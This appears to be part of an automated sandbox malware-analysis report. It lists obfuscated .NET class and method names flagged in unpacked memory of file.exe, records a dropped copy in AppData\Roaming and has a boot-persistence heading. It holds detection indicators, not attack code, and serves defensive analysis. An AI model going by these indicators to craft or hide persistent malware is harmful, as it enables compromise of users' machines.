Source: 0.2.file.exe.a990000.6.raw.unpack, L7RYDvi9uRSkVRpcIp.cs	High entropy of concatenated method names: 'sXgDCtrqSm', 'UUQDUFLW9b', 'eJnDH7shD7', 'TbBHciY5uN', 'iZtHzWusfb', 'vIMDwWeMe4', 'RymDsyRRAB', 'hYSDhrnhon', 'JCiDLR1kOj', 'tQCD4CYZe4'
Source: 0.2.file.exe.a990000.6.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	High entropy of concatenated method names: 'SR3ugt0e9J', 'cZBumVMrk5', 'foNuJjxluE', 'WtfungbFjF', 'KUqu2XSag9', 'JqFuxxj6bb', 'DKRulgZStU', 'kTQuRGrHAH', 'GGtu5G82B0', 'coZucMSci0'
Source: 0.2.file.exe.a990000.6.raw.unpack, TaFf9sUoTgSVnkBhNP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WYKh51QOqB', 'D5ShcrfQYG', 'DB6hzjk82Z', 'MG7LwvXv4o', 'q5LLsCtlZ8', 'RUsLhQRKv9', 'COaLLsJXsP', 'gY218TqVvNWBT0e8F7o'
Source: 0.2.file.exe.a990000.6.raw.unpack, AMdRcY4GorKnOrvoUa.cs	High entropy of concatenated method names: 'U59sDFwbOD', 'XZ6soKHtGR', 'gGXsAOFMKF', 'BQ3sBXDQOV', 'HL1sdB4pte', 'KOysZRiAnL', 'C8SpTemBLZcK2aS0yM', 'RZAiipuIKlEEBNyL6v', 'nQrssZnPFu', 'ukRsLY41wl'
Source: 0.2.file.exe.a990000.6.raw.unpack, pkh0G1uZoydiDvOK3f.cs	High entropy of concatenated method names: 'Dispose', 'rEns59IPIM', 'YlehNxloF1', 'tYrrjh9Tf6', 'isZscnBUdb', 'ztxszbQp0P', 'ProcessDialogKey', 'SkahwX277t', 'Hr5hsJyYE8', 'rAshhESGJG'
Source: 0.2.file.exe.a990000.6.raw.unpack, Jte8OyfRiAnLR8ch8I.cs	High entropy of concatenated method names: 'mb5HSMcoVN', 'myOHuG6FPk', 'zkrHOVLvvg', 'PFXHDxxvxK', 'iMkHoCNtPb', 'iAgO2Eo7AW', 'JPxOxS3xJg', 'qdAOl7XrSD', 'dDWORoMT6Z', 'f9AO5pV9lq'
Source: 0.2.file.exe.a990000.6.raw.unpack, LA6JDgzuIKNuUQtq78.cs	High entropy of concatenated method names: 'AvatqpV7op', 'NKotFc2B2R', 'XmNtTCnAMG', 'p2ptfJGX0v', 'Ir5tN3beMu', 'sm5t662sEA', 'DM7tp2aeIL', 'KM5traiHo8', 'pbStXa8sHr', 'NyAtvVFpnS'
Source: 0.2.file.exe.a990000.6.raw.unpack, lX277t5Nr5JyYE83As.cs	High entropy of concatenated method names: 'tiu3fkrIsZ', 'zSc3NHLLy1', 'wrU3Eoox0t', 'UOP36GAgMP', 'OEL3pD6njw', 'OZO38bpnqK', 'XOv3itIWsD', 'WbC31P7lxG', 'TNZ3MZ4t6a', 'BG139Cm5aA'
Source: 0.2.file.exe.a990000.6.raw.unpack, LRcbmAs4yQT2aPJklqS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AN073G1H9f', 'zHf7tu4nxW', 'WSj7IO7iMM', 'MsF77Twd5M', 'xQu7K9hXq4', 'EbM7br7tVm', 'UoQ7rjmway'
Source: 0.2.file.exe.a990000.6.raw.unpack, TAbEPVssQUeaPTSkVGZ.cs	High entropy of concatenated method names: 'iPItc75gHo', 'G7EtzI3iVU', 'mGwIwFyV2E', 'LBlIsQiZoJ', 'w1AIh4agRZ', 'vmKILgiTgs', 'D7SI41E9bg', 'BB9ISDtyt5', 'fZmICF49vw', 'iTsIuyvvLM'
Source: 0.2.file.exe.a990000.6.raw.unpack, BwIkHUsw2LlsjTqZS0f.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dhKt0tEN1V', 'Hs9tGFajJl', 'gf4tQuKPly', 'r0RtgpkTjG', 'ePOtmcpwCV', 'Bt5tJWyY7I', 'RtwtnYWR4j'
Source: 0.2.file.exe.a990000.6.raw.unpack, dv2s6aMUCSmiJ0LiGO.cs	High entropy of concatenated method names: 'DiwDXp2xKJ', 'UA9DvYHn83', 'NgwDkQ8xFU', 'T7DDyxIItP', 'QbNDWnHgOa', 'kI2DqrfcdZ', 'p47DjFhX8m', 'VuEDFdAOLo', 'Jd2DTHeJln', 'RK3DedFNiv'
Source: 0.2.file.exe.a990000.6.raw.unpack, BtUSU8hADUHsiExgTp.cs	High entropy of concatenated method names: 'VY9kuTD9g', 'IPryhAIbi', 'fZJqoNJao', 'uTGj1M56U', 'TnQTlK0Ia', 'sRYeNnWot', 'ilpLtnJRZRhfFQu8di', 'Y8U7DhiGuPolL059eF', 'kMVYojbwt', 'yW2tvByT5'
Source: 0.2.file.exe.a990000.6.raw.unpack, LS35MxlylYEn9IPIMH.cs	High entropy of concatenated method names: 'ENR3drdYuN', 'jcS3VailIU', 'E4H33FSvme', 'Mi33IFb0xs', 'I5u3Kfk119', 'zuU3rhBSf1', 'Dispose', 'WCDYCFyenE', 'NKTYurhlV6', 'NEwYUGcuRd'
Source: 0.2.file.exe.a990000.6.raw.unpack, AOGn2SQIVXq8u2s0X5.cs	High entropy of concatenated method names: 'dO9PFxBXRg', 'HUWPTJKgpj', 'C11Pf4q0WQ', 'ze9PNeUrNM', 'xZFP6gPSGA', 'HcKPpk654d', 'ztnPidj2Rl', 'FY1P1e5ZCx', 'eGAP9sbjWR', 'NyFP0TuGjp'
Source: 0.2.file.exe.a990000.6.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	High entropy of concatenated method names: 'Xj6LS4AONV', 'TQELCR4Enw', 'SndLulWg5Y', 'ahtLUluuM4', 'KA5LOanock', 'h12LHU5pnh', 'emVLDiFHec', 'yrkLo9qWeh', 'AWsLaevr5v', 'CrWLAwaXQM'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, ISGJGicn0u5VHlJ0wR.cs	High entropy of concatenated method names: 'ypWtUcZvIs', 'bgGtOQOEjt', 'Lm6tHV5EtD', 'cXhtDSTYp1', 'J6gt3JWJF9', 'KVKtoPHcOR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, jQOVJ8eMnmJ9dNL1B4.cs	High entropy of concatenated method names: 'tBAOW7FcRh', 'G3nOjFpf07', 'NPdUE7d2c6', 'wiuU6yaR9Q', 'gD6UpCOlIA', 'jZFU8OTN67', 'dXyUifWReM', 'HiiU1LPdrS', 'R6CUM45LWA', 'woOU9EkLxR'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, rrWmUuTGXOFMKFWQ3X.cs	High entropy of concatenated method names: 'UbhUyiMQLm', 'nesUqKQKUv', 'lNBUFTgEwx', 'TvKUTcKy9e', 'yevUdsXqSw', 'C0VUZNeMqt', 'WhxUVl8XaC', 'rJlUYn6X5v', 'wURU3q8JnQ', 'NcHUtAW7v5'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, SI1uuhxAvJKBhkcc7W.cs	High entropy of concatenated method names: 'eJnVRR53vd', 'CgOVc0HAfy', 'q2xYw7HjPZ', 'V1XYswA6cl', 'BUNV086fr9', 'JA7VGjcdmN', 'TOFVQrTvln', 'aOhVgAF5FQ', 'GmVVmoMqvc', 'jFIVJuydrH'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, JGB4ptJyEgrMK4noUv.cs	High entropy of concatenated method names: 'ToString', 'gGEZ0j3NGV', 'un6ZNw3UU2', 'B3jZEiSb2v', 'qmSZ6Rq5PL', 'DInZpr70EL', 'YSHZ851sjU', 'VtcZi7O9NF', 'L8CZ1SrLMW', 'WisZMxtmm8'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, L7RYDvi9uRSkVRpcIp.cs	High entropy of concatenated method names: 'sXgDCtrqSm', 'UUQDUFLW9b', 'eJnDH7shD7', 'TbBHciY5uN', 'iZtHzWusfb', 'vIMDwWeMe4', 'RymDsyRRAB', 'hYSDhrnhon', 'JCiDLR1kOj', 'tQCD4CYZe4'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	High entropy of concatenated method names: 'SR3ugt0e9J', 'cZBumVMrk5', 'foNuJjxluE', 'WtfungbFjF', 'KUqu2XSag9', 'JqFuxxj6bb', 'DKRulgZStU', 'kTQuRGrHAH', 'GGtu5G82B0', 'coZucMSci0'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, TaFf9sUoTgSVnkBhNP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WYKh51QOqB', 'D5ShcrfQYG', 'DB6hzjk82Z', 'MG7LwvXv4o', 'q5LLsCtlZ8', 'RUsLhQRKv9', 'COaLLsJXsP', 'gY218TqVvNWBT0e8F7o'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, AMdRcY4GorKnOrvoUa.cs	High entropy of concatenated method names: 'U59sDFwbOD', 'XZ6soKHtGR', 'gGXsAOFMKF', 'BQ3sBXDQOV', 'HL1sdB4pte', 'KOysZRiAnL', 'C8SpTemBLZcK2aS0yM', 'RZAiipuIKlEEBNyL6v', 'nQrssZnPFu', 'ukRsLY41wl'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, pkh0G1uZoydiDvOK3f.cs	High entropy of concatenated method names: 'Dispose', 'rEns59IPIM', 'YlehNxloF1', 'tYrrjh9Tf6', 'isZscnBUdb', 'ztxszbQp0P', 'ProcessDialogKey', 'SkahwX277t', 'Hr5hsJyYE8', 'rAshhESGJG'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, Jte8OyfRiAnLR8ch8I.cs	High entropy of concatenated method names: 'mb5HSMcoVN', 'myOHuG6FPk', 'zkrHOVLvvg', 'PFXHDxxvxK', 'iMkHoCNtPb', 'iAgO2Eo7AW', 'JPxOxS3xJg', 'qdAOl7XrSD', 'dDWORoMT6Z', 'f9AO5pV9lq'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, LA6JDgzuIKNuUQtq78.cs	High entropy of concatenated method names: 'AvatqpV7op', 'NKotFc2B2R', 'XmNtTCnAMG', 'p2ptfJGX0v', 'Ir5tN3beMu', 'sm5t662sEA', 'DM7tp2aeIL', 'KM5traiHo8', 'pbStXa8sHr', 'NyAtvVFpnS'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, lX277t5Nr5JyYE83As.cs	High entropy of concatenated method names: 'tiu3fkrIsZ', 'zSc3NHLLy1', 'wrU3Eoox0t', 'UOP36GAgMP', 'OEL3pD6njw', 'OZO38bpnqK', 'XOv3itIWsD', 'WbC31P7lxG', 'TNZ3MZ4t6a', 'BG139Cm5aA'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, LRcbmAs4yQT2aPJklqS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AN073G1H9f', 'zHf7tu4nxW', 'WSj7IO7iMM', 'MsF77Twd5M', 'xQu7K9hXq4', 'EbM7br7tVm', 'UoQ7rjmway'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, TAbEPVssQUeaPTSkVGZ.cs	High entropy of concatenated method names: 'iPItc75gHo', 'G7EtzI3iVU', 'mGwIwFyV2E', 'LBlIsQiZoJ', 'w1AIh4agRZ', 'vmKILgiTgs', 'D7SI41E9bg', 'BB9ISDtyt5', 'fZmICF49vw', 'iTsIuyvvLM'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, BwIkHUsw2LlsjTqZS0f.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dhKt0tEN1V', 'Hs9tGFajJl', 'gf4tQuKPly', 'r0RtgpkTjG', 'ePOtmcpwCV', 'Bt5tJWyY7I', 'RtwtnYWR4j'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, dv2s6aMUCSmiJ0LiGO.cs	High entropy of concatenated method names: 'DiwDXp2xKJ', 'UA9DvYHn83', 'NgwDkQ8xFU', 'T7DDyxIItP', 'QbNDWnHgOa', 'kI2DqrfcdZ', 'p47DjFhX8m', 'VuEDFdAOLo', 'Jd2DTHeJln', 'RK3DedFNiv'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, BtUSU8hADUHsiExgTp.cs	High entropy of concatenated method names: 'VY9kuTD9g', 'IPryhAIbi', 'fZJqoNJao', 'uTGj1M56U', 'TnQTlK0Ia', 'sRYeNnWot', 'ilpLtnJRZRhfFQu8di', 'Y8U7DhiGuPolL059eF', 'kMVYojbwt', 'yW2tvByT5'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, LS35MxlylYEn9IPIMH.cs	High entropy of concatenated method names: 'ENR3drdYuN', 'jcS3VailIU', 'E4H33FSvme', 'Mi33IFb0xs', 'I5u3Kfk119', 'zuU3rhBSf1', 'Dispose', 'WCDYCFyenE', 'NKTYurhlV6', 'NEwYUGcuRd'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, AOGn2SQIVXq8u2s0X5.cs	High entropy of concatenated method names: 'dO9PFxBXRg', 'HUWPTJKgpj', 'C11Pf4q0WQ', 'ze9PNeUrNM', 'xZFP6gPSGA', 'HcKPpk654d', 'ztnPidj2Rl', 'FY1P1e5ZCx', 'eGAP9sbjWR', 'NyFP0TuGjp'
Source: 0.2.file.exe.46a75e0.2.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	High entropy of concatenated method names: 'Xj6LS4AONV', 'TQELCR4Enw', 'SndLulWg5Y', 'ahtLUluuM4', 'KA5LOanock', 'h12LHU5pnh', 'emVLDiFHec', 'yrkLo9qWeh', 'AWsLaevr5v', 'CrWLAwaXQM'
Source: 0.2.file.exe.470c600.1.raw.unpack, ISGJGicn0u5VHlJ0wR.cs	High entropy of concatenated method names: 'ypWtUcZvIs', 'bgGtOQOEjt', 'Lm6tHV5EtD', 'cXhtDSTYp1', 'J6gt3JWJF9', 'KVKtoPHcOR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.470c600.1.raw.unpack, jQOVJ8eMnmJ9dNL1B4.cs	High entropy of concatenated method names: 'tBAOW7FcRh', 'G3nOjFpf07', 'NPdUE7d2c6', 'wiuU6yaR9Q', 'gD6UpCOlIA', 'jZFU8OTN67', 'dXyUifWReM', 'HiiU1LPdrS', 'R6CUM45LWA', 'woOU9EkLxR'
Source: 0.2.file.exe.470c600.1.raw.unpack, rrWmUuTGXOFMKFWQ3X.cs	High entropy of concatenated method names: 'UbhUyiMQLm', 'nesUqKQKUv', 'lNBUFTgEwx', 'TvKUTcKy9e', 'yevUdsXqSw', 'C0VUZNeMqt', 'WhxUVl8XaC', 'rJlUYn6X5v', 'wURU3q8JnQ', 'NcHUtAW7v5'
Source: 0.2.file.exe.470c600.1.raw.unpack, SI1uuhxAvJKBhkcc7W.cs	High entropy of concatenated method names: 'eJnVRR53vd', 'CgOVc0HAfy', 'q2xYw7HjPZ', 'V1XYswA6cl', 'BUNV086fr9', 'JA7VGjcdmN', 'TOFVQrTvln', 'aOhVgAF5FQ', 'GmVVmoMqvc', 'jFIVJuydrH'
Source: 0.2.file.exe.470c600.1.raw.unpack, JGB4ptJyEgrMK4noUv.cs	High entropy of concatenated method names: 'ToString', 'gGEZ0j3NGV', 'un6ZNw3UU2', 'B3jZEiSb2v', 'qmSZ6Rq5PL', 'DInZpr70EL', 'YSHZ851sjU', 'VtcZi7O9NF', 'L8CZ1SrLMW', 'WisZMxtmm8'
Source: 0.2.file.exe.470c600.1.raw.unpack, L7RYDvi9uRSkVRpcIp.cs	High entropy of concatenated method names: 'sXgDCtrqSm', 'UUQDUFLW9b', 'eJnDH7shD7', 'TbBHciY5uN', 'iZtHzWusfb', 'vIMDwWeMe4', 'RymDsyRRAB', 'hYSDhrnhon', 'JCiDLR1kOj', 'tQCD4CYZe4'
Source: 0.2.file.exe.470c600.1.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	High entropy of concatenated method names: 'SR3ugt0e9J', 'cZBumVMrk5', 'foNuJjxluE', 'WtfungbFjF', 'KUqu2XSag9', 'JqFuxxj6bb', 'DKRulgZStU', 'kTQuRGrHAH', 'GGtu5G82B0', 'coZucMSci0'
Source: 0.2.file.exe.470c600.1.raw.unpack, TaFf9sUoTgSVnkBhNP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WYKh51QOqB', 'D5ShcrfQYG', 'DB6hzjk82Z', 'MG7LwvXv4o', 'q5LLsCtlZ8', 'RUsLhQRKv9', 'COaLLsJXsP', 'gY218TqVvNWBT0e8F7o'
Source: 0.2.file.exe.470c600.1.raw.unpack, AMdRcY4GorKnOrvoUa.cs	High entropy of concatenated method names: 'U59sDFwbOD', 'XZ6soKHtGR', 'gGXsAOFMKF', 'BQ3sBXDQOV', 'HL1sdB4pte', 'KOysZRiAnL', 'C8SpTemBLZcK2aS0yM', 'RZAiipuIKlEEBNyL6v', 'nQrssZnPFu', 'ukRsLY41wl'
Source: 0.2.file.exe.470c600.1.raw.unpack, pkh0G1uZoydiDvOK3f.cs	High entropy of concatenated method names: 'Dispose', 'rEns59IPIM', 'YlehNxloF1', 'tYrrjh9Tf6', 'isZscnBUdb', 'ztxszbQp0P', 'ProcessDialogKey', 'SkahwX277t', 'Hr5hsJyYE8', 'rAshhESGJG'
Source: 0.2.file.exe.470c600.1.raw.unpack, Jte8OyfRiAnLR8ch8I.cs	High entropy of concatenated method names: 'mb5HSMcoVN', 'myOHuG6FPk', 'zkrHOVLvvg', 'PFXHDxxvxK', 'iMkHoCNtPb', 'iAgO2Eo7AW', 'JPxOxS3xJg', 'qdAOl7XrSD', 'dDWORoMT6Z', 'f9AO5pV9lq'
Source: 0.2.file.exe.470c600.1.raw.unpack, LA6JDgzuIKNuUQtq78.cs	High entropy of concatenated method names: 'AvatqpV7op', 'NKotFc2B2R', 'XmNtTCnAMG', 'p2ptfJGX0v', 'Ir5tN3beMu', 'sm5t662sEA', 'DM7tp2aeIL', 'KM5traiHo8', 'pbStXa8sHr', 'NyAtvVFpnS'
Source: 0.2.file.exe.470c600.1.raw.unpack, lX277t5Nr5JyYE83As.cs	High entropy of concatenated method names: 'tiu3fkrIsZ', 'zSc3NHLLy1', 'wrU3Eoox0t', 'UOP36GAgMP', 'OEL3pD6njw', 'OZO38bpnqK', 'XOv3itIWsD', 'WbC31P7lxG', 'TNZ3MZ4t6a', 'BG139Cm5aA'
Source: 0.2.file.exe.470c600.1.raw.unpack, LRcbmAs4yQT2aPJklqS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AN073G1H9f', 'zHf7tu4nxW', 'WSj7IO7iMM', 'MsF77Twd5M', 'xQu7K9hXq4', 'EbM7br7tVm', 'UoQ7rjmway'
Source: 0.2.file.exe.470c600.1.raw.unpack, TAbEPVssQUeaPTSkVGZ.cs	High entropy of concatenated method names: 'iPItc75gHo', 'G7EtzI3iVU', 'mGwIwFyV2E', 'LBlIsQiZoJ', 'w1AIh4agRZ', 'vmKILgiTgs', 'D7SI41E9bg', 'BB9ISDtyt5', 'fZmICF49vw', 'iTsIuyvvLM'
Source: 0.2.file.exe.470c600.1.raw.unpack, BwIkHUsw2LlsjTqZS0f.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dhKt0tEN1V', 'Hs9tGFajJl', 'gf4tQuKPly', 'r0RtgpkTjG', 'ePOtmcpwCV', 'Bt5tJWyY7I', 'RtwtnYWR4j'
Source: 0.2.file.exe.470c600.1.raw.unpack, dv2s6aMUCSmiJ0LiGO.cs	High entropy of concatenated method names: 'DiwDXp2xKJ', 'UA9DvYHn83', 'NgwDkQ8xFU', 'T7DDyxIItP', 'QbNDWnHgOa', 'kI2DqrfcdZ', 'p47DjFhX8m', 'VuEDFdAOLo', 'Jd2DTHeJln', 'RK3DedFNiv'
Source: 0.2.file.exe.470c600.1.raw.unpack, BtUSU8hADUHsiExgTp.cs	High entropy of concatenated method names: 'VY9kuTD9g', 'IPryhAIbi', 'fZJqoNJao', 'uTGj1M56U', 'TnQTlK0Ia', 'sRYeNnWot', 'ilpLtnJRZRhfFQu8di', 'Y8U7DhiGuPolL059eF', 'kMVYojbwt', 'yW2tvByT5'
Source: 0.2.file.exe.470c600.1.raw.unpack, LS35MxlylYEn9IPIMH.cs	High entropy of concatenated method names: 'ENR3drdYuN', 'jcS3VailIU', 'E4H33FSvme', 'Mi33IFb0xs', 'I5u3Kfk119', 'zuU3rhBSf1', 'Dispose', 'WCDYCFyenE', 'NKTYurhlV6', 'NEwYUGcuRd'
Source: 0.2.file.exe.470c600.1.raw.unpack, AOGn2SQIVXq8u2s0X5.cs	High entropy of concatenated method names: 'dO9PFxBXRg', 'HUWPTJKgpj', 'C11Pf4q0WQ', 'ze9PNeUrNM', 'xZFP6gPSGA', 'HcKPpk654d', 'ztnPidj2Rl', 'FY1P1e5ZCx', 'eGAP9sbjWR', 'NyFP0TuGjp'
Source: 0.2.file.exe.470c600.1.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	High entropy of concatenated method names: 'Xj6LS4AONV', 'TQELCR4Enw', 'SndLulWg5Y', 'ahtLUluuM4', 'KA5LOanock', 'h12LHU5pnh', 'emVLDiFHec', 'yrkLo9qWeh', 'AWsLaevr5v', 'CrWLAwaXQM'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, ISGJGicn0u5VHlJ0wR.cs	High entropy of concatenated method names: 'ypWtUcZvIs', 'bgGtOQOEjt', 'Lm6tHV5EtD', 'cXhtDSTYp1', 'J6gt3JWJF9', 'KVKtoPHcOR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, jQOVJ8eMnmJ9dNL1B4.cs	High entropy of concatenated method names: 'tBAOW7FcRh', 'G3nOjFpf07', 'NPdUE7d2c6', 'wiuU6yaR9Q', 'gD6UpCOlIA', 'jZFU8OTN67', 'dXyUifWReM', 'HiiU1LPdrS', 'R6CUM45LWA', 'woOU9EkLxR'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, rrWmUuTGXOFMKFWQ3X.cs	High entropy of concatenated method names: 'UbhUyiMQLm', 'nesUqKQKUv', 'lNBUFTgEwx', 'TvKUTcKy9e', 'yevUdsXqSw', 'C0VUZNeMqt', 'WhxUVl8XaC', 'rJlUYn6X5v', 'wURU3q8JnQ', 'NcHUtAW7v5'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, SI1uuhxAvJKBhkcc7W.cs	High entropy of concatenated method names: 'eJnVRR53vd', 'CgOVc0HAfy', 'q2xYw7HjPZ', 'V1XYswA6cl', 'BUNV086fr9', 'JA7VGjcdmN', 'TOFVQrTvln', 'aOhVgAF5FQ', 'GmVVmoMqvc', 'jFIVJuydrH'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, JGB4ptJyEgrMK4noUv.cs	High entropy of concatenated method names: 'ToString', 'gGEZ0j3NGV', 'un6ZNw3UU2', 'B3jZEiSb2v', 'qmSZ6Rq5PL', 'DInZpr70EL', 'YSHZ851sjU', 'VtcZi7O9NF', 'L8CZ1SrLMW', 'WisZMxtmm8'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, L7RYDvi9uRSkVRpcIp.cs	High entropy of concatenated method names: 'sXgDCtrqSm', 'UUQDUFLW9b', 'eJnDH7shD7', 'TbBHciY5uN', 'iZtHzWusfb', 'vIMDwWeMe4', 'RymDsyRRAB', 'hYSDhrnhon', 'JCiDLR1kOj', 'tQCD4CYZe4'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	High entropy of concatenated method names: 'SR3ugt0e9J', 'cZBumVMrk5', 'foNuJjxluE', 'WtfungbFjF', 'KUqu2XSag9', 'JqFuxxj6bb', 'DKRulgZStU', 'kTQuRGrHAH', 'GGtu5G82B0', 'coZucMSci0'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, TaFf9sUoTgSVnkBhNP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WYKh51QOqB', 'D5ShcrfQYG', 'DB6hzjk82Z', 'MG7LwvXv4o', 'q5LLsCtlZ8', 'RUsLhQRKv9', 'COaLLsJXsP', 'gY218TqVvNWBT0e8F7o'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, AMdRcY4GorKnOrvoUa.cs	High entropy of concatenated method names: 'U59sDFwbOD', 'XZ6soKHtGR', 'gGXsAOFMKF', 'BQ3sBXDQOV', 'HL1sdB4pte', 'KOysZRiAnL', 'C8SpTemBLZcK2aS0yM', 'RZAiipuIKlEEBNyL6v', 'nQrssZnPFu', 'ukRsLY41wl'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, pkh0G1uZoydiDvOK3f.cs	High entropy of concatenated method names: 'Dispose', 'rEns59IPIM', 'YlehNxloF1', 'tYrrjh9Tf6', 'isZscnBUdb', 'ztxszbQp0P', 'ProcessDialogKey', 'SkahwX277t', 'Hr5hsJyYE8', 'rAshhESGJG'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, Jte8OyfRiAnLR8ch8I.cs	High entropy of concatenated method names: 'mb5HSMcoVN', 'myOHuG6FPk', 'zkrHOVLvvg', 'PFXHDxxvxK', 'iMkHoCNtPb', 'iAgO2Eo7AW', 'JPxOxS3xJg', 'qdAOl7XrSD', 'dDWORoMT6Z', 'f9AO5pV9lq'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, LA6JDgzuIKNuUQtq78.cs	High entropy of concatenated method names: 'AvatqpV7op', 'NKotFc2B2R', 'XmNtTCnAMG', 'p2ptfJGX0v', 'Ir5tN3beMu', 'sm5t662sEA', 'DM7tp2aeIL', 'KM5traiHo8', 'pbStXa8sHr', 'NyAtvVFpnS'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, lX277t5Nr5JyYE83As.cs	High entropy of concatenated method names: 'tiu3fkrIsZ', 'zSc3NHLLy1', 'wrU3Eoox0t', 'UOP36GAgMP', 'OEL3pD6njw', 'OZO38bpnqK', 'XOv3itIWsD', 'WbC31P7lxG', 'TNZ3MZ4t6a', 'BG139Cm5aA'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, LRcbmAs4yQT2aPJklqS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AN073G1H9f', 'zHf7tu4nxW', 'WSj7IO7iMM', 'MsF77Twd5M', 'xQu7K9hXq4', 'EbM7br7tVm', 'UoQ7rjmway'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, TAbEPVssQUeaPTSkVGZ.cs	High entropy of concatenated method names: 'iPItc75gHo', 'G7EtzI3iVU', 'mGwIwFyV2E', 'LBlIsQiZoJ', 'w1AIh4agRZ', 'vmKILgiTgs', 'D7SI41E9bg', 'BB9ISDtyt5', 'fZmICF49vw', 'iTsIuyvvLM'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, BwIkHUsw2LlsjTqZS0f.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dhKt0tEN1V', 'Hs9tGFajJl', 'gf4tQuKPly', 'r0RtgpkTjG', 'ePOtmcpwCV', 'Bt5tJWyY7I', 'RtwtnYWR4j'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, dv2s6aMUCSmiJ0LiGO.cs	High entropy of concatenated method names: 'DiwDXp2xKJ', 'UA9DvYHn83', 'NgwDkQ8xFU', 'T7DDyxIItP', 'QbNDWnHgOa', 'kI2DqrfcdZ', 'p47DjFhX8m', 'VuEDFdAOLo', 'Jd2DTHeJln', 'RK3DedFNiv'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, BtUSU8hADUHsiExgTp.cs	High entropy of concatenated method names: 'VY9kuTD9g', 'IPryhAIbi', 'fZJqoNJao', 'uTGj1M56U', 'TnQTlK0Ia', 'sRYeNnWot', 'ilpLtnJRZRhfFQu8di', 'Y8U7DhiGuPolL059eF', 'kMVYojbwt', 'yW2tvByT5'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, LS35MxlylYEn9IPIMH.cs	High entropy of concatenated method names: 'ENR3drdYuN', 'jcS3VailIU', 'E4H33FSvme', 'Mi33IFb0xs', 'I5u3Kfk119', 'zuU3rhBSf1', 'Dispose', 'WCDYCFyenE', 'NKTYurhlV6', 'NEwYUGcuRd'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, AOGn2SQIVXq8u2s0X5.cs	High entropy of concatenated method names: 'dO9PFxBXRg', 'HUWPTJKgpj', 'C11Pf4q0WQ', 'ze9PNeUrNM', 'xZFP6gPSGA', 'HcKPpk654d', 'ztnPidj2Rl', 'FY1P1e5ZCx', 'eGAP9sbjWR', 'NyFP0TuGjp'
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	High entropy of concatenated method names: 'Xj6LS4AONV', 'TQELCR4Enw', 'SndLulWg5Y', 'ahtLUluuM4', 'KA5LOanock', 'h12LHU5pnh', 'emVLDiFHec', 'yrkLo9qWeh', 'AWsLaevr5v', 'CrWLAwaXQM'

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

Jump to dropped file

Boot Survival

